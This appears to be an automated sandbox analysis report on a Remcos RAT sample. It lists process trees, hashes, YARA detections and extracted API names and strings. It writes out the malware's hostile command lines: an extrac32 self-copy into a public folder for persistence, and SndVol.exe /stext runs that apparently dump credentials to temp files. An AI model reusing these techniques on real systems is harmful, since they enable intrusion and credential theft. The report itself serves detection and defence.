fdffbf76f-5b7nw X-ODWebServer: nameastus2946819-odwebpl X-Cache: CONFIG_NOCACHE X-MSEdge-Ref: Ref A: 8094703DD6D14E9BB941C4B1BCB6DBFF Ref B: BN3EDGE0811 Ref C: 2024-05-14T23:57:13Z Date: Tue, 14 May 2024 23:57:13 GMT Connection: close Content-Length: 0

Target ID:	0
Start time:	01:56:46
Start date:	15/05/2024
Path:	C:\Users\user\Desktop\HGTQP09643009.scr.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\HGTQP09643009.scr.exe"
Imagebase:	0x400000
File size:	1'103'360 bytes
MD5 hash:	C8B0899DD51C7516316ED413771E71C4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	01:56:50
Start date:	15/05/2024
Path:	C:\Windows\SysWOW64\extrac32.exe
Wow64 process (32bit):	true
Commandline:	C:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\user\Desktop\HGTQP09643009.scr.exe C:\\Users\\Public\\Libraries\\Jsqwmpul.PIF
Imagebase:	0x2f0000
File size:	29'184 bytes
MD5 hash:	9472AAB6390E4F1431BAA912FCFF9707
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	01:56:50
Start date:	15/05/2024
Path:	C:\Windows\SysWOW64\SndVol.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\System32\SndVol.exe
Imagebase:	0xaa0000
File size:	226'712 bytes
MD5 hash:	BD4A1CC3429ED1251E5185A72501839B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000003.00000002.4419622044.000000001E42F000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PrivateLoader, Description: Yara detected PrivateLoader, Source: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000003.00000002.4408997863.0000000005350000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000003.00000002.4408997863.0000000005350000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PrivateLoader, Description: Yara detected PrivateLoader, Source: 00000003.00000002.4408997863.0000000005350000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000003.00000002.4408997863.0000000005350000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000003.00000002.4408997863.0000000005350000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000003.00000002.4408997863.0000000005350000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000003.00000002.4408561480.0000000003483000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	4
Start time:	01:56:53
Start date:	15/05/2024
Path:	C:\Windows\SysWOW64\SndVol.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\user\AppData\Local\Temp\xkjscr"
Imagebase:	0xaa0000
File size:	226'712 bytes
MD5 hash:	BD4A1CC3429ED1251E5185A72501839B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	01:56:53
Start date:	15/05/2024
Path:	C:\Windows\SysWOW64\SndVol.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\user\AppData\Local\Temp\hfwldkaiv"
Imagebase:	0xaa0000
File size:	226'712 bytes
MD5 hash:	BD4A1CC3429ED1251E5185A72501839B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	01:56:53
Start date:	15/05/2024
Path:	C:\Windows\SysWOW64\SndVol.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\user\AppData\Local\Temp\hfwldkaiv"
Imagebase:	0xaa0000
File size:	226'712 bytes
MD5 hash:	BD4A1CC3429ED1251E5185A72501839B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	01:56:53
Start date:	15/05/2024
Path:	C:\Windows\SysWOW64\SndVol.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\user\AppData\Local\Temp\hfwldkaiv"
Imagebase:	0xaa0000
File size:	226'712 bytes
MD5 hash:	BD4A1CC3429ED1251E5185A72501839B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	01:56:53
Start date:	15/05/2024
Path:	C:\Windows\SysWOW64\SndVol.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\user\AppData\Local\Temp\jhbdectkjqlx"
Imagebase:	0xaa0000
File size:	226'712 bytes
MD5 hash:	BD4A1CC3429ED1251E5185A72501839B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	01:57:02
Start date:	15/05/2024
Path:	C:\Users\Public\Libraries\Jsqwmpul.PIF
Wow64 process (32bit):	true
Commandline:	"C:\Users\Public\Libraries\Jsqwmpul.PIF"
Imagebase:	0x400000
File size:	1'103'360 bytes
MD5 hash:	C8B0899DD51C7516316ED413771E71C4
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	Borland Delphi
Antivirus matches:	Detection: 61%, ReversingLabs Detection: 60%, Virustotal, Browse
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	01:57:06
Start date:	15/05/2024
Path:	C:\Windows\SysWOW64\SndVol.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\System32\SndVol.exe
Imagebase:	0xaa0000
File size:	226'712 bytes
MD5 hash:	BD4A1CC3429ED1251E5185A72501839B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	01:57:11
Start date:	15/05/2024
Path:	C:\Users\Public\Libraries\Jsqwmpul.PIF
Wow64 process (32bit):	true
Commandline:	"C:\Users\Public\Libraries\Jsqwmpul.PIF"
Imagebase:	0x400000
File size:	1'103'360 bytes
MD5 hash:	C8B0899DD51C7516316ED413771E71C4
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	Borland Delphi
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	01:57:15
Start date:	15/05/2024
Path:	C:\Windows\SysWOW64\colorcpl.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\System32\colorcpl.exe
Imagebase:	0xed0000
File size:	86'528 bytes
MD5 hash:	DB71E132EBF1FEB6E93E8A2A0F0C903D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000D.00000002.2251885365.0000000006F80000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000D.00000002.2251885365.0000000006F80000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PrivateLoader, Description: Yara detected PrivateLoader, Source: 0000000D.00000002.2251885365.0000000006F80000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000D.00000002.2251885365.0000000006F80000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000000D.00000002.2251885365.0000000006F80000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 0000000D.00000002.2251885365.0000000006F80000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000D.00000002.2251261824.0000000003129000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000D.00000003.2246883380.0000000003129000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000D.00000002.2247045059.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000D.00000002.2247045059.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PrivateLoader, Description: Yara detected PrivateLoader, Source: 0000000D.00000002.2247045059.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000D.00000002.2247045059.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000000D.00000002.2247045059.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 0000000D.00000002.2247045059.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	moderate
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	20.3%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	78.6%
Total number of Nodes:	845
Total number of Limit Nodes:	15

Executed Functions

Function 0291D5C8 Relevance: 234.1, APIs: 13, Strings: 116, Instructions: 8388processCOMMON

Download Yara Rule

APIs

Part of subcall function 02917DF4: LoadLibraryW.KERNEL32(?,00000000,02917EC3), ref: 02917E24
Part of subcall function 02917DF4: GetModuleHandleW.KERNEL32(?,?,00000000,02917EC3), ref: 02917E2A
Part of subcall function 02917DF4: GetProcAddress.KERNEL32(00000000,00000000), ref: 02917E43

Part of subcall function 02907E08: GetFileAttributesA.KERNEL32(00000000,?,0291E18C,ScanString,0293F358,029272FC,OpenSession,0293F358,029272FC,ScanString,0293F358,029272FC,UacScan,0293F358,029272FC,UacInitialize), ref: 02907E13

Part of subcall function 0290C2DC: GetModuleFileNameA.KERNEL32(00000000,?,00000105,?,?,0291E4BE,ScanBuffer,0293F358,029272FC,OpenSession,0293F358,029272FC,ScanBuffer,0293F358,029272FC,OpenSession), ref: 0290C2F3

Part of subcall function 0291C7B8: RtlDosPathNameToNtPathName_U.NTDLL(00000000,?,00000000,00000000), ref: 0291C7F3
Part of subcall function 0291C7B8: NtOpenFile.NTDLL(?,00100001,?,?,00000001,00000020), ref: 0291C823
Part of subcall function 0291C7B8: NtQueryInformationFile.NTDLL(?,?,?,00000018,00000005), ref: 0291C838
Part of subcall function 0291C7B8: NtReadFile.NTDLL(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000), ref: 0291C864
Part of subcall function 0291C7B8: NtClose.NTDLL(?), ref: 0291C86D

Part of subcall function 02907E2C: GetFileAttributesA.KERNEL32(00000000,?,02921221,ScanString,0293F358,029272FC,OpenSession,0293F358,029272FC,OpenSession,0293F358,029272FC,ScanBuffer,0293F358,029272FC,ScanString), ref: 02907E37

Part of subcall function 02907FC0: CreateDirectoryA.KERNEL32(00000000,00000000,?,02921412,ScanBuffer,0293F358,029272FC,OpenSession,0293F358,029272FC,Initialize,0293F358,029272FC,ScanString,0293F358,029272FC), ref: 02907FCD

WinExec.KERNEL32(00000000,029276CC), ref: 029226D9

Part of subcall function 0291C6D4: RtlDosPathNameToNtPathName_U.NTDLL(00000000,?,00000000,00000000), ref: 0291C713
Part of subcall function 0291C6D4: NtCreateFile.NTDLL(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000), ref: 0291C74D
Part of subcall function 0291C6D4: NtWriteFile.NTDLL(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000), ref: 0291C77A
Part of subcall function 0291C6D4: NtClose.NTDLL(?), ref: 0291C783

Strings

BCryptRegisterProvider, xrefs: 0291DC7C
sppc, xrefs: 02925A2F, 02925A62, 02925A95, 02925AC8, 02926AD0, 02926B03
C:\\Windows\\System32\\extrac32.exe /C /Y , xrefs: 029226A7
Initialize, xrefs: 0291D765, 0291E589, 0291E71D, 0291E8BB, 0291EA61, 0291ED1D, 0291F3C3, 0291F807, 0291FCB1, 0291FDBB, 029204A2, 029207D4, 02920AF4, 02920E28, 02921235, 029215C5, 02921A73, 02921E08, 02922204, 029223C9, 029224C1, 02922766, 0292296B, 029238DE, 02924596, 02924F56, 02925B66, 02925F04, 02926433, 029268E5, 02926E22
NtAccessCheck, xrefs: 02926CB7
SLIsGenuineLocalEx, xrefs: 02925A7E
FlushInstructionCache, xrefs: 02926879
EnumServicesStatusA, xrefs: 0292655B
[InternetShortcut], xrefs: 02922F40
BCryptQueryProviderRegistration, xrefs: 0291DC49
C:\Windows\System32\, xrefs: 0291E177, 02923B61
SxTracerGetThreadContextDebug, xrefs: 02925C8B, 02926A53
tquery, xrefs: 02925C6F
`&, xrefs: 0291F775, 0291F9F6
GetProcessMemoryInfo, xrefs: 02925CF1
UacUninitialize, xrefs: 02921549
EtwEventWriteEx, xrefs: 02926DB6
EnumServicesStatusExW, xrefs: 02926588
NtQuerySecurityObject, xrefs: 02926C84
CreateProcessWithLogonW, xrefs: 029265E2
NtMapViewOfSection, xrefs: 02926C1E
CreateProcessW, xrefs: 029265B5
IconIndex=, xrefs: 02922FA3
CryptSIPGetSignedDataMsg, xrefs: 0291DB67
C:\\Users\\Public\\Libraries\\, xrefs: 0292236C
NtQuerySystemInformation, xrefs: 0292651F
Ntdll, xrefs: 02926524, 02926533, 02926542, 02926551
UacScan, xrefs: 0291D82D, 0291DE46, 0291DF3E, 0291E50D, 0291F0FA, 0291F6E3, 02920045, 02920758, 029216BD, 02921D8C, 029222FC, 0292253D, 029227E2, 029228EF, 02922B4D, 02922C45, 029237E6, 02923B88, 02923D9F, 02923F32, 02924202, 02924612, 0292479B, 02924893, 02924A24, 02924BB7, 02924D5D, 02924FD2, 029251EC, 029253CD, 02925566, 02925818
UacInitialize, xrefs: 0291D7C9, 0291DEC2, 0291E605, 02921AEF, 02921FDC, 02923AE3, 029250F4, 0292660C
wintrust, xrefs: 0291D987, 0291D9BA, 0291D9ED
NtOpenProcess, xrefs: 02924F3B
SLGetSLIDList, xrefs: 02925A4B
CryptSIPVerifyIndirectData, xrefs: 0291DB34, 02925D24
TrustOpenStores, xrefs: 0291D970
kernel32, xrefs: 02926791, 029267C4, 029267F7, 0292682A, 0292685D, 02926890, 029268C3
CreateProcessAsUserA, xrefs: 029265C4
dbgcore, xrefs: 02924F04, 02924F18
Advapi, xrefs: 02926560, 0292656F, 0292657E, 0292658D, 029265C9, 029265D8, 029265E7
@^@, xrefs: 0291F9F1
NtDeviceIoControlFile, xrefs: 0292652E
SLGetGenuineInformation, xrefs: 02925A18
VirtualAlloc, xrefs: 0292677A
DlpNotifyPreDragDrop, xrefs: 02925FF6
DlpCheckIsCloudSyncApp, xrefs: 02926029
VirtualAllocEx, xrefs: 029267AD
DllGetClassObject, xrefs: 0291D888, 0291DDA7, 02921327, 02925CBE, 02926A86
EnumServicesStatusExA, xrefs: 02926579
WriteVirtualMemory, xrefs: 02926846
MZP, xrefs: 0292553B
ScanString, xrefs: 0291D639, 0291D906, 0291DA0F, 0291DBA0, 0291DD31, 0291DFBA, 0291E0FB, 0291E681, 0291F2A0, 0291F43F, 0291F883, 0291FA9E, 0291FB1A, 0291FE37, 0292015D, 02920426, 02920863, 02920C94, 02920EA4, 0292118F, 02921739, 029217B5, 0292194F, 02921C94, 02922058, 029226EA, 02922ED0, 02923045, 029230FD, 0292376A, 02923C04, 0292406B, 0292468E, 029252C3, 029256A4, 029259A2, 02925D5D, 02926144, 0292633B, 02926704, 029269DD
OpenProcess, xrefs: 02926813
BCryptVerifySignature, xrefs: 0291DC16, 02925E4F
GET, xrefs: 029201D4
mssip32, xrefs: 0291DB18, 0291DB4B, 0291DB7E, 02925D3B
bcrypt, xrefs: 0291DC2D, 0291DC60, 0291DC93, 02925E66
DlpGetArchiveFileTraceInfo, xrefs: 0292605C
EnumServicesStatusW, xrefs: 0292656A
WintrustAddActionID, xrefs: 0291D9A3
smartscreenps, xrefs: 0291DDBE, 0291DDF1, 0291DE24
DEEX, xrefs: 0291D612
CryptSIPGetInfo, xrefs: 0291DB01
NtWriteVirtualMemory, xrefs: 02926D50
EtwEventWrite, xrefs: 02926DE9
ScanBuffer, xrefs: 0291D701, 0291DA8B, 0291DCB5, 0291E21C, 0291E329, 0291E441, 0291E815, 0291E9B3, 0291EB59, 0291EC7C, 0291EE15, 0291EF0D, 0291F176, 0291F31C, 0291F4BB, 0291F5D9, 0291F667, 0291F97B, 0291FC1C, 0291FD2D, 0291FECA, 02920275, 02920381, 0292059F, 029206BC, 029209D7, 02920A78, 02920BEC, 02920DAC, 02920F5D, 02921380, 0292141E, 02921641, 029218AD, 02921BE7, 02921F00, 02922280, 02922635, 0292285E, 02922A63, 02922BC9, 02922D3D, 02922DB9, 0292395A, 029239EB, 02923E1B, 02923FAE, 0292410A, 0292427E, 0292471F, 0292498B, 02924B1C, 02924CAF, 02924E55, 02925170, 02925449, 029255E2, 0292579C, 029258AA, 02925BE2, 02925F80, 029264AF, 02926F1A
psapi, xrefs: 02925D08
RtlAllocateHeap, xrefs: 029261ED, 02926253
DllRegisterServer, xrefs: 0291D8D6, 0291DE0D
DllGetActivationFactory, xrefs: 0291DDDA
WinHttp.WinHttpRequest.5.1, xrefs: 029200BB
RtlQueryProcessDebugInformation, xrefs: 0292654C
.url, xrefs: 02921F90
NtQueryInformationThread, xrefs: 02926B85
^^Nc, xrefs: 0291EBCF, 0291F392
CreateProcessAsUserW, xrefs: 029265D3, 029265F1
HotKey=, xrefs: 029230D7
RetailTracerEnable, xrefs: 02925C58
SLLoadApplicationPolicies, xrefs: 02925AB1
EnumProcessModules, xrefs: 02926597
Kernel32, xrefs: 029265AB, 029265BA, 029265F6
NtCreateSection, xrefs: 02926BEB
GetProxyDllInfo, xrefs: 0291D8AF
URL=file:", xrefs: 02922F4F
NtQueryVirtualMemory, xrefs: 02926B52
DlpGetWebSiteAccess, xrefs: 0292608F
sppwmi, xrefs: 02926A9D
FindCertsByIssuer, xrefs: 0291D9D6
NtOpenSection, xrefs: 02926BB8
MiniDumpReadDumpStream, xrefs: 02924F13
NtOpenFile, xrefs: 02926D83
NtSetSecurityObject, xrefs: 02924F27
ieproxy, xrefs: 0291D899, 0291D8C0, 0291D8E7
OpenSession, xrefs: 0291D69D, 0291E07F, 0291E1A0, 0291E2AD, 0291E3C5, 0291E799, 0291E937, 0291EADD, 0291EC00, 0291ED99, 0291EE91, 0291F07E, 0291F224, 0291F55D, 0291F78B, 0291F8FF, 0291FA22, 0291FBA0, 0291FF46, 0291FFC9, 029200E1, 029201F9, 02920305, 02920523, 02920640, 029208DF, 0292095B, 02920B70, 02920D10, 02920FD9, 02921113, 029212B1, 0292149A, 02921831, 029219CB, 02921B6B, 02921D10, 02921E84, 029220D4, 02922188, 02922445, 029225B9, 029229E7, 02922CC1, 02922E35, 02922FC9, 02923179, 02923862, 02923A67, 02923C80, 02923D23, 02923EB6, 02924186, 0292451A, 02924817, 0292490F, 02924AA0, 02924C33, 02924DD9, 0292504E, 0292533F, 029254C5, 02925720, 02925926, 02925AEA, 02925DD9, 02925E88, 029260C8, 029262BF, 029263B7, 02926688, 02926961, 02926E9E
SetUnhandledExceptionFilter, xrefs: 029268AC
CreateProcessA, xrefs: 029265A6
LdrLoadDll, xrefs: 02926CEA
ntdll, xrefs: 02924EDC, 02924F2C, 02924F40, 029261D1, 02926204, 02926237, 0292626A, 0292629D, 02926B36, 02926B69, 02926B9C, 02926BCF, 02926C02, 02926C35, 02926C68, 02926C9B, 02926CCE, 02926D01, 02926D34, 02926D67, 02926D9A, 02926DCD, 02926E00
VirtualProtect, xrefs: 029267E0
MiniDumpWriteDump, xrefs: 02924EFF
NtAlertResumeThread, xrefs: 029261BA
D2^Tyj}~TVrgoij[Dkcxn}dmu, xrefs: 0291E6F7
http, xrefs: 0291FEA7
RtlCreateQueryDebugBuffer, xrefs: 02926286
endpointdlp, xrefs: 0292600D, 02926040, 02926073, 029260A6
NtWaitForSingleObject, xrefs: 02926220
NtQueryDirectoryFile, xrefs: 0292653D
NtReadVirtualMemory, xrefs: 02926C51
SLGatherMigrationBlob, xrefs: 02926AB9
NtOpenObjectAuditAlarm, xrefs: 02924ED7
SLGetEncryptedPIDEx, xrefs: 02926AEC
C:\Users\Public\, xrefs: 02921F85, 029231E9
psapi, xrefs: 0292659C
NtGetWriteWatch, xrefs: 02926B1F
I_QueryTagInformation, xrefs: 02924EEB
LdrGetProcedureAddress, xrefs: 02926D1D
advapi32, xrefs: 02924EF0
spp, xrefs: 02925CA2, 02925CD5, 02926A6A

Memory Dump Source

Source File: 00000000.00000002.2003854445.0000000002900000.00000040.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true

Associated: 00000000.00000002.2003854445.0000000002929000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2900000_HGTQP09643009.jbxd

Similarity

API ID: File$Path$Name$AttributesCloseCreateModuleName_$AddressDirectoryExecHandleInformationLibraryLoadOpenProcQueryReadWrite
String ID: .url$@^@$Advapi$BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$C:\Users\Public\$C:\Windows\System32\$C:\\Users\\Public\\Libraries\\$C:\\Windows\\System32\\extrac32.exe /C /Y $CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPGetInfo$CryptSIPGetSignedDataMsg$CryptSIPVerifyIndirectData$D2^Tyj}~TVrgoij[Dkcxn}dmu$DEEX$DllGetActivationFactory$DllGetClassObject$DllRegisterServer$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FindCertsByIssuer$FlushInstructionCache$GET$GetProcessMemoryInfo$GetProxyDllInfo$HotKey=$I_QueryTagInformation$IconIndex=$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MZP$MiniDumpReadDumpStream$MiniDumpWriteDump$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenObjectAuditAlarm$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtSetSecurityObject$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$TrustOpenStores$URL=file:"$UacInitialize$UacScan$UacUninitialize$VirtualAlloc$VirtualAllocEx$VirtualProtect$WinHttp.WinHttpRequest.5.1$WintrustAddActionID$WriteVirtualMemory$[InternetShortcut]$^^Nc$advapi32$bcrypt$dbgcore$endpointdlp$http$ieproxy$kernel32$mssip32$ntdll$psapi$psapi$smartscreenps$spp$sppc$sppwmi$tquery$wintrust$`&
API String ID: 2999406049-1800652215
Opcode ID: 7868246980ab352d5380060cb0dcef452eab72b2c054726aa0d727ac3ef11799
Instruction ID: 4ab2069da751d5cfa39791871ff1d468fe4a5ca5ddc7e7e5a8a0041073c8092b
Opcode Fuzzy Hash: 7868246980ab352d5380060cb0dcef452eab72b2c054726aa0d727ac3ef11799
Instruction Fuzzy Hash: 0A042B35A1116D8FDB10EBA4DDC0AEDB3F6AFC5314F1054E2E508A7298DE70AE998F41

Function 0292431E Relevance: 167.0, APIs: 9, Strings: 85, Instructions: 2469
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02917DF4: LoadLibraryW.KERNEL32(?,00000000,02917EC3), ref: 02917E24
Part of subcall function 02917DF4: GetModuleHandleW.KERNEL32(?,?,00000000,02917EC3), ref: 02917E2A
Part of subcall function 02917DF4: GetProcAddress.KERNEL32(00000000,00000000), ref: 02917E43

Part of subcall function 02902EE0: QueryPerformanceCounter.KERNEL32 ref: 02902EE4

GetCurrentProcess.KERNEL32(00000000,00000000,00001000,00000040,ScanBuffer,0293F358,029272FC,OpenSession,0293F358,029272FC,UacScan,0293F358,029272FC,ScanBuffer,0293F358,029272FC), ref: 02924B9B

Part of subcall function 02917924: GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtAllocateVirtualMemory), ref: 02917931
Part of subcall function 02917924: GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 02917937
Part of subcall function 02917924: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02917957

EnumSystemLocalesA.KERNELBASE(00000000,00000000), ref: 02924ECD
GetCurrentProcess.KERNEL32(ScanBuffer,0293F358,029272FC,OpenSession,0293F358,029272FC,UacScan,0293F358,029272FC,ScanBuffer,0293F358,029272FC,OpenSession,0293F358,029272FC,UacScan), ref: 02924ED2
GetCurrentProcess.KERNEL32(ScanBuffer,0293F358,029272FC,OpenSession,0293F358,029272FC,UacScan,0293F358,029272FC,ScanBuffer,0293F358,029272FC,OpenSession,0293F358,029272FC,UacScan), ref: 02924EE6
GetCurrentProcess.KERNEL32(ScanBuffer,0293F358,029272FC,OpenSession,0293F358,029272FC,UacScan,0293F358,029272FC,ScanBuffer,0293F358,029272FC,OpenSession,0293F358,029272FC,UacScan), ref: 02924EFA

Part of subcall function 02917CA8: LoadLibraryW.KERNEL32(bcrypt,?,00000000,00000000,0293F384,0291998C,ScanString,0293F384,02919CD0,ScanBuffer,0293F384,02919CD0,Initialize,0293F384,02919CD0,UacScan), ref: 02917CBC
Part of subcall function 02917CA8: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02917CD6
Part of subcall function 02917CA8: NtWriteVirtualMemory.NTDLL(00000000,00000000,0293F368,00000001,0293F374), ref: 02917CFC
Part of subcall function 02917CA8: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000000,00000000,0293F384,0291998C,ScanString,0293F384,02919CD0,ScanBuffer,0293F384,02919CD0,Initialize), ref: 02917D12

GetCurrentProcess.KERNEL32(ScanBuffer,0293F358,029272FC,OpenSession,0293F358,029272FC,UacScan,0293F358,029272FC,ScanBuffer,0293F358,029272FC,OpenSession,0293F358,029272FC,UacScan), ref: 02924F0E
GetCurrentProcess.KERNEL32(ScanBuffer,0293F358,029272FC,OpenSession,0293F358,029272FC,UacScan,0293F358,029272FC,ScanBuffer,0293F358,029272FC,OpenSession,0293F358,029272FC,UacScan), ref: 02924F22
GetCurrentProcess.KERNEL32(ScanBuffer,0293F358,029272FC,OpenSession,0293F358,029272FC,UacScan,0293F358,029272FC,ScanBuffer,0293F358,029272FC,OpenSession,0293F358,029272FC,UacScan), ref: 02924F36

